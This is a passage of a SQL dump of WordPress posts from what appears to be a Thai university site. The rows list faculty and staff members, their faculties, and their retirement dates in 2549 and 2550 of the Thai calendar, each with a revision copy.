(286, 1, '2019-05-26 15:12:26', '2019-05-26 08:12:26', 'รองศาสตราจารย์ทัศนีย์  ประธาน\r\n\r\nสังกัด  คณะครุศาสตร์\r\n\r\nเกษียณอายุราชการ  วันที่ 30 กันยายน 2549', 'รองศาสตราจารย์ทัศนีย์  ประธาน', '', 'publish', 'closed', 'open', '', '%e0%b8%a3%e0%b8%ad%e0%b8%87%e0%b8%a8%e0%b8%b2%e0%b8%aa%e0%b8%95%e0%b8%a3%e0%b8%b2%e0%b8%88%e0%b8%b2%e0%b8%a3%e0%b8%a2%e0%b9%8c%e0%b8%97%e0%b8%b1%e0%b8%a8%e0%b8%99%e0%b8%b5%e0%b8%a2%e0%b9%8c', '', '', '2019-05-26 15:12:26', '2019-05-26 08:12:26', '', 0, 'http://172.17.40.11/wp511/?p=286', 0, 'post', '', 0),
(287, 1, '2019-05-26 15:12:26', '2019-05-26 08:12:26', 'รองศาสตราจารย์ทัศนีย์  ประธาน\r\n\r\nสังกัด  คณะครุศาสตร์\r\n\r\nเกษียณอายุราชการ  วันที่ 30 กันยายน 2549', 'รองศาสตราจารย์ทัศนีย์  ประธาน', '', 'inherit', 'closed', 'closed', '', '286-revision-v1', '', '', '2019-05-26 15:12:26', '2019-05-26 08:12:26', '', 286, 'http://172.17.40.11/wp511/?p=287', 0, 'revision', '', 0),
(288, 1, '2019-05-26 15:12:38', '2019-05-26 08:12:38', 'ผู้ช่วยศาสตราจารย์วิมล  เทพนวล\r\n\r\nสังกัด  คณะครุศาสตร์\r\n\r\nเกษียณอายุราชการ  วันที่ 30 กัรนยายน 2549', 'ผู้ช่วยศาสตราจารย์วิมล  เทพนวล', '', 'publish', 'closed', 'open', '', '%e0%b8%9c%e0%b8%b9%e0%b9%89%e0%b8%8a%e0%b9%88%e0%b8%a7%e0%b8%a2%e0%b8%a8%e0%b8%b2%e0%b8%aa%e0%b8%95%e0%b8%a3%e0%b8%b2%e0%b8%88%e0%b8%b2%e0%b8%a3%e0%b8%a2%e0%b9%8c%e0%b8%a7%e0%b8%b4%e0%b8%a1%e0%b8%a5', '', '', '2019-05-26 15:12:38', '2019-05-26 08:12:38', '', 0, 'http://172.17.40.11/wp511/?p=288', 0, 'post', '', 0),
(289, 1, '2019-05-26 15:12:38', '2019-05-26 08:12:38', 'ผู้ช่วยศาสตราจารย์วิมล  เทพนวล\r\n\r\nสังกัด  คณะครุศาสตร์\r\n\r\nเกษียณอายุราชการ  วันที่ 30 กัรนยายน 2549', 'ผู้ช่วยศาสตราจารย์วิมล  เทพนวล', '', 'inherit', 'closed', 'closed', '', '288-revision-v1', '', '', '2019-05-26 15:12:38', '2019-05-26 08:12:38', '', 288, 'http://172.17.40.11/wp511/?p=289', 0, 'revision', '', 0),
(290, 1, '2019-05-26 15:12:53', '2019-05-26 08:12:53', 'ผู้ช่วยศาสตราจารย์สมเชื้อ  มหาราชเสนา\r\n\r\nสังกัด  คณะครุศาสตร์\r\n\r\nเกษียณอายุราชการ  วันที่ 30 กันยายน 2549', 'ผู้ช่วยศาสตราจารย์สมเชื้อ  มหาราชเสนา', '', 'publish', 'closed', 'open', '', '%e0%b8%9c%e0%b8%b9%e0%b9%89%e0%b8%8a%e0%b9%88%e0%b8%a7%e0%b8%a2%e0%b8%a8%e0%b8%b2%e0%b8%aa%e0%b8%95%e0%b8%a3%e0%b8%b2%e0%b8%88%e0%b8%b2%e0%b8%a3%e0%b8%a2%e0%b9%8c%e0%b8%aa%e0%b8%a1%e0%b9%80%e0%b8%8a', '', '', '2019-05-26 15:12:53', '2019-05-26 08:12:53', '', 0, 'http://172.17.40.11/wp511/?p=290', 0, 'post', '', 0),
(291, 1, '2019-05-26 15:12:53', '2019-05-26 08:12:53', 'ผู้ช่วยศาสตราจารย์สมเชื้อ  มหาราชเสนา\r\n\r\nสังกัด  คณะครุศาสตร์\r\n\r\nเกษียณอายุราชการ  วันที่ 30 กันยายน 2549', 'ผู้ช่วยศาสตราจารย์สมเชื้อ  มหาราชเสนา', '', 'inherit', 'closed', 'closed', '', '290-revision-v1', '', '', '2019-05-26 15:12:53', '2019-05-26 08:12:53', '', 290, 'http://172.17.40.11/wp511/?p=291', 0, 'revision', '', 0),
(292, 1, '2019-05-26 15:13:05', '2019-05-26 08:13:05', 'ผู้ช่วยศาสตราจารย์เตือน  พรหมเมศ\r\n\r\nสังกัด  คณะมนุษยศาสตร์และสังคมศาสตร์\r\n\r\nเกษียณอายุราชการ  วันที่ 30 กันยายน 2549', 'ผู้ช่วยศาสตราจารย์เตือน  พรหมเมศ', '', 'publish', 'closed', 'open', '', '%e0%b8%9c%e0%b8%b9%e0%b9%89%e0%b8%8a%e0%b9%88%e0%b8%a7%e0%b8%a2%e0%b8%a8%e0%b8%b2%e0%b8%aa%e0%b8%95%e0%b8%a3%e0%b8%b2%e0%b8%88%e0%b8%b2%e0%b8%a3%e0%b8%a2%e0%b9%8c%e0%b9%80%e0%b8%95%e0%b8%b7%e0%b8%ad', '', '', '2019-05-26 15:13:05', '2019-05-26 08:13:05', '', 0, 'http://172.17.40.11/wp511/?p=292', 0, 'post', '', 0),
(293, 1, '2019-05-26 15:13:05', '2019-05-26 08:13:05', 'ผู้ช่วยศาสตราจารย์เตือน  พรหมเมศ\r\n\r\nสังกัด  คณะมนุษยศาสตร์และสังคมศาสตร์\r\n\r\nเกษียณอายุราชการ  วันที่ 30 กันยายน 2549', 'ผู้ช่วยศาสตราจารย์เตือน  พรหมเมศ', '', 'inherit', 'closed', 'closed', '', '292-revision-v1', '', '', '2019-05-26 15:13:05', '2019-05-26 08:13:05', '', 292, 'http://172.17.40.11/wp511/?p=293', 0, 'revision', '', 0),
(294, 1, '2019-05-26 15:13:18', '2019-05-26 08:13:18', 'อาจารย์สุนิตย์  วงศ์พลาย\r\n\r\nสังกัด  คณะมนุษยศาสตร์และสังคมศาสตร์\r\n\r\nเกษียณอายุราชการ  วันที่ 30 กันยายน 2549', 'อาจารย์สุนิตย์  วงศ์พลาย', '', 'publish', 'closed', 'open', '', '%e0%b8%ad%e0%b8%b2%e0%b8%88%e0%b8%b2%e0%b8%a3%e0%b8%a2%e0%b9%8c%e0%b8%aa%e0%b8%b8%e0%b8%99%e0%b8%b4%e0%b8%95%e0%b8%a2%e0%b9%8c-%e0%b8%a7%e0%b8%87%e0%b8%a8%e0%b9%8c%e0%b8%9e%e0%b8%a5%e0%b8%b2', '', '', '2019-05-26 15:13:18', '2019-05-26 08:13:18', '', 0, 'http://172.17.40.11/wp511/?p=294', 0, 'post', '', 0),
(295, 1, '2019-05-26 15:13:18', '2019-05-26 08:13:18', 'อาจารย์สุนิตย์  วงศ์พลาย\r\n\r\nสังกัด  คณะมนุษยศาสตร์และสังคมศาสตร์\r\n\r\nเกษียณอายุราชการ  วันที่ 30 กันยายน 2549', 'อาจารย์สุนิตย์  วงศ์พลาย', '', 'inherit', 'closed', 'closed', '', '294-revision-v1', '', '', '2019-05-26 15:13:18', '2019-05-26 08:13:18', '', 294, 'http://172.17.40.11/wp511/?p=295', 0, 'revision', '', 0),
(296, 1, '2019-05-26 15:13:32', '2019-05-26 08:13:32', 'ผู้ช่วยศาสตราจารย์เจริญศรี  ตรีน้อยวา\r\n\r\nสังกัด  คณะวิทยาการจัดการ\r\n\r\nเกษียณอายุราชการ  วันที่ 30 กันยายน 2549', 'ผู้ช่วยศาสตราจารย์เจริญศรี  ตรีน้อยวา', '', 'publish', 'closed', 'open', '', '%e0%b8%9c%e0%b8%b9%e0%b9%89%e0%b8%8a%e0%b9%88%e0%b8%a7%e0%b8%a2%e0%b8%a8%e0%b8%b2%e0%b8%aa%e0%b8%95%e0%b8%a3%e0%b8%b2%e0%b8%88%e0%b8%b2%e0%b8%a3%e0%b8%a2%e0%b9%8c%e0%b9%80%e0%b8%88%e0%b8%a3%e0%b8%b4', '', '', '2019-05-26 15:13:32', '2019-05-26 08:13:32', '', 0, 'http://172.17.40.11/wp511/?p=296', 0, 'post', '', 0),
(297, 1, '2019-05-26 15:13:32', '2019-05-26 08:13:32', 'ผู้ช่วยศาสตราจารย์เจริญศรี  ตรีน้อยวา\r\n\r\nสังกัด  คณะวิทยาการจัดการ\r\n\r\nเกษียณอายุราชการ  วันที่ 30 กันยายน 2549', 'ผู้ช่วยศาสตราจารย์เจริญศรี  ตรีน้อยวา', '', 'inherit', 'closed', 'closed', '', '296-revision-v1', '', '', '2019-05-26 15:13:32', '2019-05-26 08:13:32', '', 296, 'http://172.17.40.11/wp511/?p=297', 0, 'revision', '', 0),
(298, 1, '2019-05-26 15:13:46', '2019-05-26 08:13:46', 'ดร.ฉลอง  ฤทธิภักดี\r\n\r\nสังกัด  คณะวิทยาการจัดการ\r\n\r\nเกษียณอายุราชการ  วันที่ 30 กันยายน 2549', 'ดร.ฉลอง  ฤทธิภักดี', '', 'publish', 'closed', 'open', '', '%e0%b8%94%e0%b8%a3-%e0%b8%89%e0%b8%a5%e0%b8%ad%e0%b8%87-%e0%b8%a4%e0%b8%97%e0%b8%98%e0%b8%b4%e0%b8%a0%e0%b8%b1%e0%b8%81%e0%b8%94%e0%b8%b5', '', '', '2019-05-26 15:13:46', '2019-05-26 08:13:46', '', 0, 'http://172.17.40.11/wp511/?p=298', 0, 'post', '', 0),
(299, 1, '2019-05-26 15:13:46', '2019-05-26 08:13:46', 'ดร.ฉลอง  ฤทธิภักดี\r\n\r\nสังกัด  คณะวิทยาการจัดการ\r\n\r\nเกษียณอายุราชการ  วันที่ 30 กันยายน 2549', 'ดร.ฉลอง  ฤทธิภักดี', '', 'inherit', 'closed', 'closed', '', '298-revision-v1', '', '', '2019-05-26 15:13:46', '2019-05-26 08:13:46', '', 298, 'http://172.17.40.11/wp511/?p=299', 0, 'revision', '', 0),
(300, 1, '2019-05-26 15:13:59', '2019-05-26 08:13:59', 'ผู้ช่วยศาสตราจารย์ชนะ  นิลรัตน์\r\n\r\nสังกัด  คณะวิทยาการจัดการ\r\n\r\nเกษียณอายุราชการ  วันที่ 30 กันยายน 2549', 'ผู้ช่วยศาสตราจารย์ชนะ  นิลรัตน์', '', 'publish', 'closed', 'open', '', '%e0%b8%9c%e0%b8%b9%e0%b9%89%e0%b8%8a%e0%b9%88%e0%b8%a7%e0%b8%a2%e0%b8%a8%e0%b8%b2%e0%b8%aa%e0%b8%95%e0%b8%a3%e0%b8%b2%e0%b8%88%e0%b8%b2%e0%b8%a3%e0%b8%a2%e0%b9%8c%e0%b8%8a%e0%b8%99%e0%b8%b0', '', '', '2019-05-26 15:13:59', '2019-05-26 08:13:59', '', 0, 'http://172.17.40.11/wp511/?p=300', 0, 'post', '', 0),
(301, 1, '2019-05-26 15:13:59', '2019-05-26 08:13:59', 'ผู้ช่วยศาสตราจารย์ชนะ  นิลรัตน์\r\n\r\nสังกัด  คณะวิทยาการจัดการ\r\n\r\nเกษียณอายุราชการ  วันที่ 30 กันยายน 2549', 'ผู้ช่วยศาสตราจารย์ชนะ  นิลรัตน์', '', 'inherit', 'closed', 'closed', '', '300-revision-v1', '', '', '2019-05-26 15:13:59', '2019-05-26 08:13:59', '', 300, 'http://172.17.40.11/wp511/?p=301', 0, 'revision', '', 0),
(302, 1, '2019-05-26 15:14:11', '2019-05-26 08:14:11', 'อาจารย์วิทยา  ไกรวิมล\r\n\r\nสังกัด  คณะวิทยาการจัดการ\r\n\r\nเกษียณอายุราชการ  วันที่ 30 กันยายน 2549', 'อาจารย์วิทยา  ไกรวิมล', '', 'publish', 'closed', 'open', '', '%e0%b8%ad%e0%b8%b2%e0%b8%88%e0%b8%b2%e0%b8%a3%e0%b8%a2%e0%b9%8c%e0%b8%a7%e0%b8%b4%e0%b8%97%e0%b8%a2%e0%b8%b2-%e0%b9%84%e0%b8%81%e0%b8%a3%e0%b8%a7%e0%b8%b4%e0%b8%a1%e0%b8%a5', '', '', '2019-05-26 15:14:11', '2019-05-26 08:14:11', '', 0, 'http://172.17.40.11/wp511/?p=302', 0, 'post', '', 0);
INSERT INTO `wp_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(303, 1, '2019-05-26 15:14:11', '2019-05-26 08:14:11', 'อาจารย์วิทยา  ไกรวิมล\r\n\r\nสังกัด  คณะวิทยาการจัดการ\r\n\r\nเกษียณอายุราชการ  วันที่ 30 กันยายน 2549', 'อาจารย์วิทยา  ไกรวิมล', '', 'inherit', 'closed', 'closed', '', '302-revision-v1', '', '', '2019-05-26 15:14:11', '2019-05-26 08:14:11', '', 302, 'http://172.17.40.11/wp511/?p=303', 0, 'revision', '', 0),
(304, 1, '2019-05-26 15:14:25', '2019-05-26 08:14:25', 'ผู้ช่วยศาสตราจารย์สุเทพ  ทิพย์ธารา\r\n\r\nสังกัด  คณะวิทยาการจัดการ\r\n\r\nเกษียณอายุราชการ  วันที่ 30 กันยายน 2549', 'ผู้ช่วยศาสตราจารย์สุเทพ  ทิพย์ธารา', '', 'publish', 'closed', 'open', '', '%e0%b8%9c%e0%b8%b9%e0%b9%89%e0%b8%8a%e0%b9%88%e0%b8%a7%e0%b8%a2%e0%b8%a8%e0%b8%b2%e0%b8%aa%e0%b8%95%e0%b8%a3%e0%b8%b2%e0%b8%88%e0%b8%b2%e0%b8%a3%e0%b8%a2%e0%b9%8c%e0%b8%aa%e0%b8%b8%e0%b9%80%e0%b8%97', '', '', '2019-05-26 15:14:25', '2019-05-26 08:14:25', '', 0, 'http://172.17.40.11/wp511/?p=304', 0, 'post', '', 0),
(305, 1, '2019-05-26 15:14:25', '2019-05-26 08:14:25', 'ผู้ช่วยศาสตราจารย์สุเทพ  ทิพย์ธารา\r\n\r\nสังกัด  คณะวิทยาการจัดการ\r\n\r\nเกษียณอายุราชการ  วันที่ 30 กันยายน 2549', 'ผู้ช่วยศาสตราจารย์สุเทพ  ทิพย์ธารา', '', 'inherit', 'closed', 'closed', '', '304-revision-v1', '', '', '2019-05-26 15:14:25', '2019-05-26 08:14:25', '', 304, 'http://172.17.40.11/wp511/?p=305', 0, 'revision', '', 0),
(306, 1, '2019-05-26 15:14:39', '2019-05-26 08:14:39', 'ผู้ช่วยศาสตราจารย์กัลยา  แม้นมินทร์\r\n\r\nสังกัด  คณะวิทยาศาสตร์และเทคโนโลยี\r\n\r\nเกษียณอายุราชการ  วันที่ 30 กันยายน 2549', 'ผู้ช่วยศาสตราจารย์กัลยา  แม้นมินทร์', '', 'publish', 'closed', 'open', '', '%e0%b8%9c%e0%b8%b9%e0%b9%89%e0%b8%8a%e0%b9%88%e0%b8%a7%e0%b8%a2%e0%b8%a8%e0%b8%b2%e0%b8%aa%e0%b8%95%e0%b8%a3%e0%b8%b2%e0%b8%88%e0%b8%b2%e0%b8%a3%e0%b8%a2%e0%b9%8c%e0%b8%81%e0%b8%b1%e0%b8%a5%e0%b8%a2', '', '', '2019-05-26 15:14:39', '2019-05-26 08:14:39', '', 0, 'http://172.17.40.11/wp511/?p=306', 0, 'post', '', 0),
(307, 1, '2019-05-26 15:14:39', '2019-05-26 08:14:39', 'ผู้ช่วยศาสตราจารย์กัลยา  แม้นมินทร์\r\n\r\nสังกัด  คณะวิทยาศาสตร์และเทคโนโลยี\r\n\r\nเกษียณอายุราชการ  วันที่ 30 กันยายน 2549', 'ผู้ช่วยศาสตราจารย์กัลยา  แม้นมินทร์', '', 'inherit', 'closed', 'closed', '', '306-revision-v1', '', '', '2019-05-26 15:14:39', '2019-05-26 08:14:39', '', 306, 'http://172.17.40.11/wp511/?p=307', 0, 'revision', '', 0),
(308, 1, '2019-05-26 15:14:51', '2019-05-26 08:14:51', 'ผู้ช่วยศาสตราจารย์มะลิวรรณ  วิโนทัย\r\n\r\nสังกัด  คณะวิทยาศาสตร์และเทคโนโลยี\r\n\r\nเกษียณอายุราชการ  วันที่ 30 กันยายน 2549', 'ผู้ช่วยศาสตราจารย์มะลิวรรณ  วิโนทัย', '', 'publish', 'closed', 'open', '', '%e0%b8%9c%e0%b8%b9%e0%b9%89%e0%b8%8a%e0%b9%88%e0%b8%a7%e0%b8%a2%e0%b8%a8%e0%b8%b2%e0%b8%aa%e0%b8%95%e0%b8%a3%e0%b8%b2%e0%b8%88%e0%b8%b2%e0%b8%a3%e0%b8%a2%e0%b9%8c%e0%b8%a1%e0%b8%b0%e0%b8%a5%e0%b8%b4', '', '', '2019-05-26 15:14:51', '2019-05-26 08:14:51', '', 0, 'http://172.17.40.11/wp511/?p=308', 0, 'post', '', 0),
(309, 1, '2019-05-26 15:14:51', '2019-05-26 08:14:51', 'ผู้ช่วยศาสตราจารย์มะลิวรรณ  วิโนทัย\r\n\r\nสังกัด  คณะวิทยาศาสตร์และเทคโนโลยี\r\n\r\nเกษียณอายุราชการ  วันที่ 30 กันยายน 2549', 'ผู้ช่วยศาสตราจารย์มะลิวรรณ  วิโนทัย', '', 'inherit', 'closed', 'closed', '', '308-revision-v1', '', '', '2019-05-26 15:14:51', '2019-05-26 08:14:51', '', 308, 'http://172.17.40.11/wp511/?p=309', 0, 'revision', '', 0),
(310, 1, '2019-05-26 15:15:02', '2019-05-26 08:15:02', 'ผู้ช่วยศาสตราจารย์สนิท  อุโพธิ์\r\n\r\nสังกัด  คณะวิทยาศาสตร์และเทคโนโลยี\r\n\r\nเกษียณอายุราชการ  วันที่ 30 กันยายน 2549', 'ผู้ช่วยศาสตราจารย์สนิท  อุโพธิ์', '', 'publish', 'closed', 'open', '', '%e0%b8%9c%e0%b8%b9%e0%b9%89%e0%b8%8a%e0%b9%88%e0%b8%a7%e0%b8%a2%e0%b8%a8%e0%b8%b2%e0%b8%aa%e0%b8%95%e0%b8%a3%e0%b8%b2%e0%b8%88%e0%b8%b2%e0%b8%a3%e0%b8%a2%e0%b9%8c%e0%b8%aa%e0%b8%99%e0%b8%b4%e0%b8%97-2', '', '', '2019-05-26 15:15:02', '2019-05-26 08:15:02', '', 0, 'http://172.17.40.11/wp511/?p=310', 0, 'post', '', 0),
(311, 1, '2019-05-26 15:15:02', '2019-05-26 08:15:02', 'ผู้ช่วยศาสตราจารย์สนิท  อุโพธิ์\r\n\r\nสังกัด  คณะวิทยาศาสตร์และเทคโนโลยี\r\n\r\nเกษียณอายุราชการ  วันที่ 30 กันยายน 2549', 'ผู้ช่วยศาสตราจารย์สนิท  อุโพธิ์', '', 'inherit', 'closed', 'closed', '', '310-revision-v1', '', '', '2019-05-26 15:15:02', '2019-05-26 08:15:02', '', 310, 'http://172.17.40.11/wp511/?p=311', 0, 'revision', '', 0),
(312, 1, '2019-05-26 15:15:17', '2019-05-26 08:15:17', 'ผู้ช่วยศาสตราจารย์สุพิชัย  คงกับพันธ์\r\n\r\nสังกัด  คณะวิทยาศาสตร์และเทคโนโลยี\r\n\r\nเกษียณอายุราชการ  วันที่ 30 กันยายน 2549', 'ผู้ช่วยศาสตราจารย์สุพิชัย  คงกับพันธ์', '', 'publish', 'closed', 'open', '', '%e0%b8%9c%e0%b8%b9%e0%b9%89%e0%b8%8a%e0%b9%88%e0%b8%a7%e0%b8%a2%e0%b8%a8%e0%b8%b2%e0%b8%aa%e0%b8%95%e0%b8%a3%e0%b8%b2%e0%b8%88%e0%b8%b2%e0%b8%a3%e0%b8%a2%e0%b9%8c%e0%b8%aa%e0%b8%b8%e0%b8%9e%e0%b8%b4', '', '', '2019-05-26 15:15:17', '2019-05-26 08:15:17', '', 0, 'http://172.17.40.11/wp511/?p=312', 0, 'post', '', 0),
(313, 1, '2019-05-26 15:15:17', '2019-05-26 08:15:17', 'ผู้ช่วยศาสตราจารย์สุพิชัย  คงกับพันธ์\r\n\r\nสังกัด  คณะวิทยาศาสตร์และเทคโนโลยี\r\n\r\nเกษียณอายุราชการ  วันที่ 30 กันยายน 2549', 'ผู้ช่วยศาสตราจารย์สุพิชัย  คงกับพันธ์', '', 'inherit', 'closed', 'closed', '', '312-revision-v1', '', '', '2019-05-26 15:15:17', '2019-05-26 08:15:17', '', 312, 'http://172.17.40.11/wp511/?p=313', 0, 'revision', '', 0),
(314, 1, '2019-05-26 15:15:30', '2019-05-26 08:15:30', 'นางสาวเพ็ญศรี  รงค์เดชา\r\n\r\nสังกัด  สำนักส่งเสริมวิชาการ\r\n\r\nเกษียณอายุราชการ  วันที่ 30 กันยายน 2549', 'นางสาวเพ็ญศรี  รงค์เดชา', '', 'publish', 'closed', 'open', '', '%e0%b8%99%e0%b8%b2%e0%b8%87%e0%b8%aa%e0%b8%b2%e0%b8%a7%e0%b9%80%e0%b8%9e%e0%b9%87%e0%b8%8d%e0%b8%a8%e0%b8%a3%e0%b8%b5-%e0%b8%a3%e0%b8%87%e0%b8%84%e0%b9%8c%e0%b9%80%e0%b8%94%e0%b8%8a%e0%b8%b2', '', '', '2019-05-26 15:15:30', '2019-05-26 08:15:30', '', 0, 'http://172.17.40.11/wp511/?p=314', 0, 'post', '', 0),
(315, 1, '2019-05-26 15:15:30', '2019-05-26 08:15:30', 'นางสาวเพ็ญศรี  รงค์เดชา\r\n\r\nสังกัด  สำนักส่งเสริมวิชาการ\r\n\r\nเกษียณอายุราชการ  วันที่ 30 กันยายน 2549', 'นางสาวเพ็ญศรี  รงค์เดชา', '', 'inherit', 'closed', 'closed', '', '314-revision-v1', '', '', '2019-05-26 15:15:30', '2019-05-26 08:15:30', '', 314, 'http://172.17.40.11/wp511/?p=315', 0, 'revision', '', 0),
(316, 1, '2019-05-26 15:15:47', '2019-05-26 08:15:47', 'ผู้ช่วยศาสตราจารย์โชคชัย  วัฒนะวิบูลย์\r\n\r\nเกษียณอายุราชการ  วันที่ 30 กันยายน 2550', 'ผู้ช่วยศาสตราจารย์โชคชัย  วัฒนะวิบูลย์', '', 'publish', 'closed', 'open', '', '%e0%b8%9c%e0%b8%b9%e0%b9%89%e0%b8%8a%e0%b9%88%e0%b8%a7%e0%b8%a2%e0%b8%a8%e0%b8%b2%e0%b8%aa%e0%b8%95%e0%b8%a3%e0%b8%b2%e0%b8%88%e0%b8%b2%e0%b8%a3%e0%b8%a2%e0%b9%8c%e0%b9%82%e0%b8%8a%e0%b8%84%e0%b8%8a', '', '', '2019-05-26 15:15:47', '2019-05-26 08:15:47', '', 0, 'http://172.17.40.11/wp511/?p=316', 0, 'post', '', 0),
(317, 1, '2019-05-26 15:15:47', '2019-05-26 08:15:47', 'ผู้ช่วยศาสตราจารย์โชคชัย  วัฒนะวิบูลย์\r\n\r\nเกษียณอายุราชการ  วันที่ 30 กันยายน 2550', 'ผู้ช่วยศาสตราจารย์โชคชัย  วัฒนะวิบูลย์', '', 'inherit', 'closed', 'closed', '', '316-revision-v1', '', '', '2019-05-26 15:15:47', '2019-05-26 08:15:47', '', 316, 'http://172.17.40.11/wp511/?p=317', 0, 'revision', '', 0),
(318, 1, '2019-05-26 15:15:59', '2019-05-26 08:15:59', 'ผู้ช่วยศาสตราจารย์ดวงจิต  แก้วอุบล\r\n\r\nสังกัด  คณะครุศาสตร์\r\n\r\nเกษียณอายุราชการ  วันที่ 30 กันยายน 2550', 'ผู้ช่วยศาสตราจารย์ดวงจิต  แก้วอุบล', '', 'publish', 'closed', 'open', '', '%e0%b8%9c%e0%b8%b9%e0%b9%89%e0%b8%8a%e0%b9%88%e0%b8%a7%e0%b8%a2%e0%b8%a8%e0%b8%b2%e0%b8%aa%e0%b8%95%e0%b8%a3%e0%b8%b2%e0%b8%88%e0%b8%b2%e0%b8%a3%e0%b8%a2%e0%b9%8c%e0%b8%94%e0%b8%a7%e0%b8%87%e0%b8%88', '', '', '2019-05-26 15:15:59', '2019-05-26 08:15:59', '', 0, 'http://172.17.40.11/wp511/?p=318', 0, 'post', '', 0),
(319, 1, '2019-05-26 15:15:59', '2019-05-26 08:15:59', 'ผู้ช่วยศาสตราจารย์ดวงจิต  แก้วอุบล\r\n\r\nสังกัด  คณะครุศาสตร์\r\n\r\nเกษียณอายุราชการ  วันที่ 30 กันยายน 2550', 'ผู้ช่วยศาสตราจารย์ดวงจิต  แก้วอุบล', '', 'inherit', 'closed', 'closed', '', '318-revision-v1', '', '', '2019-05-26 15:15:59', '2019-05-26 08:15:59', '', 318, 'http://172.17.40.11/wp511/?p=319', 0, 'revision', '', 0),
(320, 1, '2019-05-26 15:16:13', '2019-05-26 08:16:13', 'ผู้ช่วยศาสตราจารย์นิรัตน์  จรจิตร\r\n\r\nสังกัด  คณะครุศาสตร์\r\n\r\nเกษียณอายุราชการ  วันที่ 30 กันยายน 2550', 'ผู้ช่วยศาสตราจารย์นิรัตน์  จรจิตร', '', 'publish', 'closed', 'open', '', '%e0%b8%9c%e0%b8%b9%e0%b9%89%e0%b8%8a%e0%b9%88%e0%b8%a7%e0%b8%a2%e0%b8%a8%e0%b8%b2%e0%b8%aa%e0%b8%95%e0%b8%a3%e0%b8%b2%e0%b8%88%e0%b8%b2%e0%b8%a3%e0%b8%a2%e0%b9%8c%e0%b8%99%e0%b8%b4%e0%b8%a3%e0%b8%b1', '', '', '2019-05-26 15:16:13', '2019-05-26 08:16:13', '', 0, 'http://172.17.40.11/wp511/?p=320', 0, 'post', '', 0),
(321, 1, '2019-05-26 15:16:13', '2019-05-26 08:16:13', 'ผู้ช่วยศาสตราจารย์นิรัตน์  จรจิตร\r\n\r\nสังกัด  คณะครุศาสตร์\r\n\r\nเกษียณอายุราชการ  วันที่ 30 กันยายน 2550', 'ผู้ช่วยศาสตราจารย์นิรัตน์  จรจิตร', '', 'inherit', 'closed', 'closed', '', '320-revision-v1', '', '', '2019-05-26 15:16:13', '2019-05-26 08:16:13', '', 320, 'http://172.17.40.11/wp511/?p=321', 0, 'revision', '', 0),
(322, 1, '2019-05-26 15:16:25', '2019-05-26 08:16:25', 'ผู้ช่วยศาสตราจารย์ประสิทธิ์  ฤทธาภิรมย์\r\n\r\nสังกัด  คณะวิทยาการจัดการ\r\n\r\nเกษียณอายุราชการ  วันที่ 30 กันยายน 2550', 'ผู้ช่วยศาสตราจารย์ประสิทธิ์  ฤทธาภิรมย์', '', 'publish', 'closed', 'open', '', '%e0%b8%9c%e0%b8%b9%e0%b9%89%e0%b8%8a%e0%b9%88%e0%b8%a7%e0%b8%a2%e0%b8%a8%e0%b8%b2%e0%b8%aa%e0%b8%95%e0%b8%a3%e0%b8%b2%e0%b8%88%e0%b8%b2%e0%b8%a3%e0%b8%a2%e0%b9%8c%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%aa', '', '', '2019-05-26 15:16:25', '2019-05-26 08:16:25', '', 0, 'http://172.17.40.11/wp511/?p=322', 0, 'post', '', 0),
(323, 1, '2019-05-26 15:16:25', '2019-05-26 08:16:25', 'ผู้ช่วยศาสตราจารย์ประสิทธิ์  ฤทธาภิรมย์\r\n\r\nสังกัด  คณะวิทยาการจัดการ\r\n\r\nเกษียณอายุราชการ  วันที่ 30 กันยายน 2550', 'ผู้ช่วยศาสตราจารย์ประสิทธิ์  ฤทธาภิรมย์', '', 'inherit', 'closed', 'closed', '', '322-revision-v1', '', '', '2019-05-26 15:16:25', '2019-05-26 08:16:25', '', 322, 'http://172.17.40.11/wp511/?p=323', 0, 'revision', '', 0),
(324, 1, '2019-05-26 15:16:37', '2019-05-26 08:16:37', 'ผู้ช่วยศาสตราจารย์ระวิ  โอภิธากร\r\n\r\nสังกัด  คณะศิลปกรรมศาสตร์\r\n\r\nเกษียณอายุราชการ  วันที่ 30 กันยายน 2550', 'ผู้ช่วยศาสตราจารย์ระวิ  โอภิธากร', '', 'publish', 'closed', 'open', '', '%e0%b8%9c%e0%b8%b9%e0%b9%89%e0%b8%8a%e0%b9%88%e0%b8%a7%e0%b8%a2%e0%b8%a8%e0%b8%b2%e0%b8%aa%e0%b8%95%e0%b8%a3%e0%b8%b2%e0%b8%88%e0%b8%b2%e0%b8%a3%e0%b8%a2%e0%b9%8c%e0%b8%a3%e0%b8%b0%e0%b8%a7%e0%b8%b4', '', '', '2019-05-26 15:16:37', '2019-05-26 08:16:37', '', 0, 'http://172.17.40.11/wp511/?p=324', 0, 'post', '', 0),
(325, 1, '2019-05-26 15:16:37', '2019-05-26 08:16:37', 'ผู้ช่วยศาสตราจารย์ระวิ  โอภิธากร\r\n\r\nสังกัด  คณะศิลปกรรมศาสตร์\r\n\r\nเกษียณอายุราชการ  วันที่ 30 กันยายน 2550', 'ผู้ช่วยศาสตราจารย์ระวิ  โอภิธากร', '', 'inherit', 'closed', 'closed', '', '324-revision-v1', '', '', '2019-05-26 15:16:37', '2019-05-26 08:16:37', '', 324, 'http://172.17.40.11/wp511/?p=325', 0, 'revision', '', 0),
(326, 1, '2019-05-26 15:16:51', '2019-05-26 08:16:51', 'อาจารย์ราตรี  ศรีสุวรรณ\r\n\r\nเกษียณอายุราชการ  วันที่ 30 กันยายน 2550', 'อาจารย์ราตรี  ศรีสุวรรณ', '', 'publish', 'closed', 'open', '', '%e0%b8%ad%e0%b8%b2%e0%b8%88%e0%b8%b2%e0%b8%a3%e0%b8%a2%e0%b9%8c%e0%b8%a3%e0%b8%b2%e0%b8%95%e0%b8%a3%e0%b8%b5-%e0%b8%a8%e0%b8%a3%e0%b8%b5%e0%b8%aa%e0%b8%b8%e0%b8%a7%e0%b8%a3%e0%b8%a3%e0%b8%93', '', '', '2019-05-26 15:16:51', '2019-05-26 08:16:51', '', 0, 'http://172.17.40.11/wp511/?p=326', 0, 'post', '', 0),
